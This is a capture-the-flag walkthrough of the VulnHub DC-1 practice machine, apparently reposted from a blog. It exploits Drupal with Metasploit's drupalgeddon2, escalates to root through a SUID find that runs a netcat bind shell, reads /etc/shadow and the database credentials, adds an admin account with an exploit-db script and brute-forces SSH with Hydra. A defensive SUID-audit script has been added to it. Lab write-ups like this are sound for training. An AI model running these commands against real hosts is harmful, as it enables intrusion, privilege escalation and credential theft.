VulnHub DC-1 range

IP: 192.168.110.212

I. Run arp-scan -l to find the live hosts on the same subnet.
Knowing the IP, visit the home page, which looks like this:

First, information gathering: an nmap port scan found the following open ports:

22 (ssh), 80 (http), 111 (rpcbind)
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35108/tcp6  status
|   100024  1          37240/udp6  status
|   100024  1          37414/udp   status
|_  100024  1          51353/tcp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds

Versions:
Content management system (CMS): Drupal 7
Web server: Apache 2.2.22
Programming language: PHP 5.4.45
Operating system: Debian
JavaScript library: jQuery 1.4.4

II. After finishing information gathering, I first searched https://www.exploit-db.com/?type=webapps by version, but found nothing. Going back to the home page, I saw that the CMS is Drupal and looked up its vulnerabilities online.

III. Searching Metasploit for drupal returns a lot of modules; I used the unix/webapp/drupal_drupalgeddon2 module.

Set the target IP, use run -j, and it returns a shell directly.

Enter python -c 'import pty;pty.spawn("/bin/sh")' to get an interactive tty.

IV. Check the system with uname -a:

Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux

After that I looked online for privilege escalation methods and went with SUID privilege escalation. Look for SUID binaries with find:
find / -user root -perm -4000 -print 2>/dev/null
The output shows that find itself runs with the SUID bit set, so any command executed through find -exec runs with root privileges.
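An added defensive check, not part of the original write-up: this script audits SUID root binaries and flags those that, like the SUID find on DC-1, can execute arbitrary commands and therefore hand out root. The list of risky basenames is an assumption (a small selection of well-known interpreters and editors); extend it for your own hosts.

```shell
#!/bin/sh
# Assumed list (not from the original post): SUID binaries that can run
# arbitrary commands or spawn a shell, so a SUID bit on them equals root.
RISKY_BASENAMES="find vim vi nano less more bash sh dash python python2 python3 perl ruby awk nmap env"

# risky_suid: read one SUID path per line on stdin and print each one whose
# basename is in RISKY_BASENAMES. Returns 0 when nothing is flagged (clean),
# 1 when at least one risky binary was found.
risky_suid() {
    found=0
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        base=${path##*/}
        for r in $RISKY_BASENAMES; do
            if [ "$base" = "$r" ]; then
                printf '%s\n' "$path"
                found=1
                break
            fi
        done
    done
    return "$found"
}

# audit_host: enumerate the real SUID-root files on this host (the same find
# invocation as the write-up, used here to audit rather than to escalate)
# and pipe them through risky_suid.
audit_host() {
    find / -user root -perm -4000 -type f -print 2>/dev/null | risky_suid
}

# fix_suid: remediation for a flagged binary, drop its SUID bit (run as root).
fix_suid() {
    chmod u-s "$1"
}
```

Run audit_host on a box like DC-1 and it prints /usr/bin/find; on a clean Debian install only passwd, su, sudo and mount-type binaries remain, none of which are flagged.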


V. First I created a text file called chen, then ran: find chen -exec whoami \;

find chen -exec netcat -lvp 5555 -e /bin/sh \;


VI. On the other side, connect to the listener.

VII. Privilege escalation succeeded. I first looked in /etc/shadow and found the flag4 user there:
flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWC
Continuing to look through the sensitive files under /var/www, I found flag 1 with the hint: "Every good CMS requires a configuration file, and you too."

VIII. So I checked online where the Drupal configuration file lives: /sites/default/settings.php. I first located it with find, then cat /var/www/sites/default/settings.php shows the database user name and password:

 'username' => 'dbuser',
 'password' => 'R0ck3t',

Now that the user and password are known, they can be used to connect to the database.

IX. Use cat on the configuration file to see the version information:

cat /var/www/includes/bootstrap.inc | grep VERSION

The output gives VERSION 7.24.
Then I tried searchsploit Drupal, which lists some python scripts; I started with this one:

 python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.110.212 -u chen -p chen


X. Log in with the user and password just added by the python script.

XI. Since the user name is already known (flag4, found in the shadow file), Hydra can be used to brute-force the password directly:

hydra -l flag4 -P pass.txt  ssh://192.168.110.212


XII. The password turns out to be orange, and the connection succeeds!

Username: flag4
Password: orange

Source: blog.51cto.com/14259169/2459028